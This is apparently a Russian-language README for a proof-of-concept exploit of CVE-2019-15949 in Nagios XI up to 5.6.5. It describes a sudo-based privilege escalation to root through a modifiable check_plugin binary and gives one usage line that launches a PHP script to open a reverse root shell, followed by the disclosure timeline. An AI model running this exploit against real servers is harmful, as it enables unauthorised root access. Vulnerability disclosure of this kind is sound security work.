
PoC, эксплуатирующий уязвимость в Nagios XI (5.6.5) для получения root-оболочки
В Nagios XI <= 5.6.5 существует уязвимость, позволяющая злоумышленнику использовать RCE для повышения привилегий до root.
Для эксплуатации требуется доступ к серверу под пользователем 'nagios' или доступ к CCM через веб-интерфейс с правами на управление плагинами.
Скрипт getprofile.sh, вызываемый при загрузке системного профиля (profile.php?cmd=download), выполняется от имени root через запись sudo без пароля; скрипт запускает исполняемый файл 'check_plugin', принадлежащий пользователю nagios.
Пользователь, вошедший в Nagios XI с правами на изменение плагинов, или пользователь 'nagios' на сервере может изменить исполняемый файл 'check_plugin' и вставить вредоносные команды, выполняемые от имени root.
Был разработан PHP PoC, который загружает полезную нагрузку, приводящую к обратному root-шеллу.
Использование:
php privesc.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port
Сообщено в Nagios: 29 июля 2019
Подтверждено Nagios: 29 июля 2019
Исправлено в версии: 5.6.6 — 20 августа 2019
CVE присвоен: 6 сентября 2019 (CVE-2019-15949 https://nvd.nist.gov/vuln/detail/CVE-2019-15949)
